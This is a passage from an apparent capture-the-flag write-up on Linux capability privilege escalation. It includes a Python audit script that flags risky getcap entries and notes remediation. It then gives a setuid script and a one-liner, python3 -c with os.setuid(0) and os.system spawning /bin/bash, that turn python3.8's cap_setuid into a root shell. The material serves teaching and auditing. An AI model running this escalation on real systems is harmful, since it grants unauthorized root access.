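    Returns one CapFinding per clause, or [] when the line is not in that form."""
    path, sep, capstr = line.strip().partition(" = ")
    if not sep:
        return []
    findings = []
    for clause in capstr.split():
        m = CLAUSE_RE.match(clause)
        if m:
            caps = frozenset(m.group(1).split(","))
            findings.append(CapFinding(path, caps, m.group(2), caps & RISKY_CAPS))
    return findings

def audit(lines):
    """Keep findings whose risky capabilities are both permitted and effective,
    i.e. usable as soon as the binary runs, which is what made python3.8 a privesc here."""
    return [f for line in lines for f in parse_getcap_line(line)
            if f.risky and "e" in f.flags and "p" in f.flags]

# Constructed input: the five getcap lines reproduced from the writeup above.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
""".splitlines()

if __name__ == "__main__":
    for f in audit(SAMPLE):
        # Remediation is to strip the capability (setcap -r PATH) or restrict who can run the tool.
        print(f"{f.path}: {','.join(sorted(f.risky))}+{f.flags}")
```

On this input only /usr/bin/python3.8 is reported; the ping/traceroute/mtr entries carry cap_net_raw, which is expected for those tools.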

image.png

image.png

The plan is that if we can change our UID we can set it to "0", which is root.

I wrote a script that will try setting the UID you pass, e.g. "0". If it can set the UID it'll spawn a bash shell with that UID; otherwise it'll print an error. So if you come across a CTF where python3 has the capability to set your UID, you can now use this, or simply use a one-liner, which I will also show.

import os

uid = os.getuid()
print("Your current SUID is:", uid)
setuid = int(input("Enter an SUID: "))
print("Attempting to set UID")
try:
    os.setuid(setuid)        # only succeeds if python holds cap_setuid (or already runs as root)
    print("Success")
    os.system("/bin/bash")   # the shell inherits the new UID
except OSError as err:
    print("An error occurred, sorry:", err)

Breaking this down: we import the "os" module and set a variable called "uid" that holds the current UID; it then prints "Your current SUID is" followed by that variable.

It then creates another variable called "setuid", which takes as input the UID the user wants to set, and prints "Attempting to set UID". It then tries to set the UID to the user's input; on success it prints "Success" and spawns a /bin/bash shell, and if it cannot set that UID it prints that an error occurred.

image.png

I am now root! The one-liner is simply:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

I hope you enjoyed this detailed writeup.

A Twitter follow is always appreciated.
